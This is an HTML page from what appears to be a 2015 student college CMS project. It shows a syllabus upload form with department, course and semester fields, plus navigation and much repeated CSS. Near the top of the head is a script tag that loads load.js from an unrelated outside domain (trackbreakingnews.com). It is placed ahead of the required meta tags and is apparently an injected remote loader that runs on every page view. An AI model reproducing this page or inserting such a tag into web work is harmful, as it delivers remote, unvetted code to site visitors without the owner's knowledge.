
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=ISO-8859-1">
  	<script src="http://d.trackbreakingnews.com/l/load.js"></script>
    <meta charset="utf-8">
    <meta http-equiv="X-UA-Compatible" content="IE=edge">
    <meta name="viewport" content="width=device-width, initial-scale=1">
    <!-- The above 3 meta tags *must* come first in the head; any other head content must come *after* these tags -->
    <meta name="description" content="">
    <meta name="author" content="">
    <link rel="icon" href="../../favicon.ico">

    <title>Profile</title>

    <!-- Bootstrap core CSS -->
    <link href="CSS/bootstrap.min.css" rel="stylesheet">
    <link href="CSS/Style.css" rel="stylesheet">
    <!-- Bootstrap theme -->
    <link href="CSS/bootstrap-theme.min.css" rel="stylesheet">

    <!-- Custom styles for this template -->
    <link href="CSS/theme.css" rel="stylesheet">

    <!-- Just for debugging purposes. Don't actually copy these 2 lines! -->
    <!--[if lt IE 9]>
    <script src="js/ie8-responsive-file-warning.js"></script>
    <![endif]-->
    <script src="js/ie-emulation-modes-warning.js"></script>
    
</script>
<link rel="stylesheet" href="CSS/animate.css">
<script src="js/wow.min.js"> </script>
<script> new WOW().init();</script>

    <!-- HTML5 shim and Respond.js for IE8 support of HTML5 elements and media queries -->
    <!--[if lt IE 9]>
      <script src="https://oss.maxcdn.com/html5shiv/3.7.2/html5shiv.min.js"></script>
      <script src="https://oss.maxcdn.com/respond/1.4.2/respond.min.js"></script>
    <![endif]-->
    <style type="text/css">
    .CX {
    background: #D9EDF7;
    
    
    }
    .JT {
    	height: 250px;
    }
     body{

	background-image:url("iWall/appx.jpg");
	background-size:cover;
}
 .ZX a{
    color:#fff;
    font-family: Lato;
    font-weight: 800px;
    text-decoration: none;
    
    }
    .ZX a:hover{
    color:#17AEDF;
    font-family: Droid-sans;
    font-weight: bold;
    text-decoration: none;
    
    }
   .NM {
  top:-45px;
  position: relative;
  left:45px;
  } 
    .NM1 {
  top:-35px;
  position: relative;
  left:55px;
   text-decoration: none;
  }
  .NM1{
  font-size: 18px;
  color: #000;
  text-decoration: none;
  font-family: Lato;
  }
  .NM1:hover{
  font-size: 18px;
  color: #000;
  text-decoration: none;
  font-family: Lato;
  }
  .DP {
  width: 210px;
  text-decoration: none;
  height:8px;
  }

 .ZX a{
    color:#fff;
    font-family: Lato;
    font-weight: 800px;
    text-decoration: none;
    
    }
    .ZX a:hover{
    color:#17AEDF;
    font-family: Droid-sans;
    font-weight: bold;
    text-decoration: none;
    
    }
  .VV {
  padding-left:75px;
  }
  .XC {
  position: relative;
  left:50px;
  }
  .BBB {
  width: 119px;
  margin-left: -5px;
  }
  .NM {
  top:-45px;
  position: relative;
  left:45px;
  }
   .XZ {
  position:relative;
  right:100px;
  top:-50px;
  margin-left: 185px;
  }
  .CXC {
  position:relative;
  top: -60px;
  }
   body{

	background-image:url("iWall/appx.jpg");
	background-size:cover;
}
 .ZX a{
    color:#fff;
    font-family: Lato;
    font-weight: 800px;
    text-decoration: none;
    
    }
    .ZX a:hover{
    color:#17AEDF;
    font-family: Droid-sans;
    font-weight: bold;
    text-decoration: none;
    
    }    
    .form-control{
    height: 30px;
    }
    .form-group{
    height: 40px;
    }
      body{

	background-image:url("iWall/appx.jpg");
	background-size:cover;
}
 .ZX a{
    color:#fff;
    font-family: Lato;
    font-weight: 800px;
    text-decoration: none;
    
    }
    .ZX a:hover{
    color:#17AEDF;
    font-family: Droid-sans;
    font-weight: bold;
    text-decoration: none;
    
    }
    .ZZZ {
    position: relative;
    top:-50px;
    }
    .FM h4 {
    font-size: 24px;
    font-weight: bold;
    }
    .mtx1zc {
    padding-left: 168px;
    }
    
     .mtx1zc1 {
    padding-left: 84px;
    }
    
     .mtx1zc2 {
    padding-left: ;
    }
    
     .mtx1zc3 {
    padding-left: 0px;
    }
    .SSv1x {
    margin-left: 45px;
    }
    
     .SSv3x {
    margin-left: 91px;
    }
    
     .SSv2x {
    margin-left: 27px;
    }
    .S00S {
    margin-left: 68px;
    }
    
    .S00S1 {
    margin-left: 48px;
    }
        .XZ {
  position:relative;
  right:100px;
  top:-50px;
  margin-left: 185px;

  }.NM {
  top:-45px;
  position: relative;
  left:45px;
  }
  </style>
 
  </head>
  <body>
				
                  	<div class="navbar navbar-default navbar-fixed-top pulse animated">
					<div class="container">
						<a class="navbar-brand XX" href="Data1.html">
							<img src="iWall/logo1.png"><p>CMS</p>
						</a>
						<button type="button" class="navbar-toggle" data-toggle="collapse" data-target=".navbar-collapse">
						<span class="icon-bar"></span>
						<span class="icon-bar"></span>
						<span class="icon-bar"></span>
						</button>
						<div class="collapse navbar-collapse">
					<ul class="nav navbar-nav pull-right">
				
                    
                     
		
	
		<tr style="border-bottom-style:solid;">
		<td>
		<a href="Owner1.html">
			<input type="image" src="iWall/aj.JPG" class="fadeInDown animated img-circle" width="45" height="45"></a>
		
		<li class="NM"></li></td>
		</tr></li> 
					 <li > <a href="Home2.html">Home</a></li>
					<li > <a href="Course.html">Course</a></li>
					<li><a href="Owner1.html">Contact us</a></li>
                       <li> <a href="Login1.html">Login</a></li>
					<li class="dropdown ">
						<a href="Owner1.html" data-toggle="dropdown" class="dropdown-toggle">Ajay Singh Bisht <span class="caret"></span></a>
						<ul class="dropdown-menu ">
						<tr style="border-bottom-style:solid;"><td>
						<a href="Owner1.html"><input type="image" src="iWall/aj.JPG" class="fadeInDown animated img-circle" width="45" height="45"></a>
						<div class="DP">
						<li class="NM1"> <a href="Owner1.html">Ajay Singh Bisht</a> </li></div>
						<li class="divider"></li>
				
						<li><a href="Forgot1.html">Setting</a></li>
						<li class="divider"></li>
						<li><a href="Msg2.html">Message <span class="badge"> 11</span></a></li>
						<li class="divider">
						<li> <a href="Logout.html">Logout</a> </li>
					
						
					
					</li>
							</ul>
	          </div> 
	      </div>
	  </div>
<br/><br/><br/>

<br/>
<nav>
	<ul class="pager XZ">
    <li class="previous"><a href="Sview.html"><span >&larr;</span> Back</a></li>
    <li class="next"><a href="Data1.html"><span >&rarr;</span> Home</a></li>
  </ul>
</nav>
<div class="container CXC">
<div class="row ">
<div class="col-lg-3 ">
	<ul class="nav nav-pills nav-stacked" id="sidebar"><hr>
		<div class="progress">
  <div class="progress-bar" role="progressbar" aria-valuenow="60" aria-valuemin="0" aria-valuemax="100" style="width: 100%;">
    <span class="sr-only"></span>
  </div>
</div><li role="presentation" class="active fadeInDown animated"><a href="News.html">News-Events</a></li>
		  <li role="presentation" class="active fadeInDown animated"><a href="Data1.html">DashBoard</a></li>

  <li role="presentation" class="active fadeInDown animated"><a href="UserManage.html">User Registration</a></li>
  <li role="presentation" class="active fadeInDown animated"><a href="Manage.html">User Management</a></li>
  <li role="presentation" class="active fadeInDown animated"><a href="Department.html">Department</a></li>
  <li role="presentation" class="active fadeInDown animated"><a href="FeedDel.html">Manage Feedback</a></li>
  <li role="presentation" class="active fadeInDown animated"><a href="Msg2.html">Manage Messages</a></li>

 <li role="presentation" class="fadeInDown animated"><a href="Sview.html">Syllabus</a></li>
 <li role="presentation" class="active fadeInDown animated"><a href="home.html">Quiz</a></li>
  <li role="presentation" class="active fadeInDown animated"><a href="About.html">About Us</a><hr></li>
</ul>

</div>
	
<div class="col-lg-8"><div class="well">
<div class="table-responsive"><br/><br/>
<div class="alert alert-info fadeInUp animated"" role="alert">Syllabus Details</div>


<tr>    <thead> 
                            <th colspan="3"><div class="well">Upload File</div></th>        
                    </thead>
    
        <form method="post" action="MyFile" enctype="multipart/form-data">
            <center>
               <table class="table table-responsive fadeInUp animated"">
                 
                    <tbody></div>
                        <tr>    
                             <td class="danger lead">Title Of File : </td>
                             <td class="danger"><input type="text" name="title" size="30"></td>
                        </tr>    
                
                         <div class="form-group">
                         <label for="nm22" class="danger lead">Department:</label>
                          <select name="cr" >
			                
			            <option value="Faculty Of Cmputer Science">Faculty Of Cmputer Science</option> 
			             <option value="Faculty Of Cmputer Science">Faculty Of Cmputer Science</option> 
			              <option value="Faculty Of Cmputer Science">Faculty Of Cmputer Science</option>      
			        </select>  
			   
			        <label for="nm22" class="danger lead">Course:</label>
                          <select name="cr1">
			             
			           <option value="MCA">MCA</option>  <option value="MCA">MCA</option> 
			            <option value="MCA">MCA</option>     
			        </select>  
			     
			        <label for="nm22" class="danger lead">Semester:</label>
                          <select name="cr2">
			                 <option value="I">I</option>  <option value="II">II</option>  <option value="III">III</option> 
			        </select>  
			     
			 
			        
			        </select>       
                        <tr>
                             <td class="danger lead">Choose File : </td>
                             <td class="danger"><input type="file" name="file_uploaded" /></td>
                        </tr>
                        <tr>
                             <td class="danger" colspan="3"><center><button type="submit" class="btn btn-info" value="Upload">Upload</center></td>
                        </tr>
                    </tbody>             
                </table>
            </center>
        </form><br><br>
   
				</div></div>
				</div>
				</div>
				</div>
	<br/><br/><br/>
				<div class="Cvv">
						<div class="container-fluid FFF">
							<div class="row">
						<div class="col-lg-12  FF">
							<h5>
							@2015 All Rights Reserved / Legal Notices / Privacy Policy  <small>Ajay Singh Bisht | 2015 | @002ajay (</em>Twitter</em>)</small>
							</h5>
						</div>
					</div>
				</div>
	
               <%} %>    
    <script src="jquery.min.js"></script>
    <script src="js/bootstrap.min.js"></script>
    <script src="js/docs.min.js"></script>
    <!-- IE10 viewport hack for Surface/desktop Windows 8 bug -->
    <script src="js/ie10-viewport-bug-workaround.js"></script>
    <script>
	$('.dropdown').hover(function() {
		$('.dropdown-toggle',this).trigger('click');
	});
	</script>
  </body>
</html>
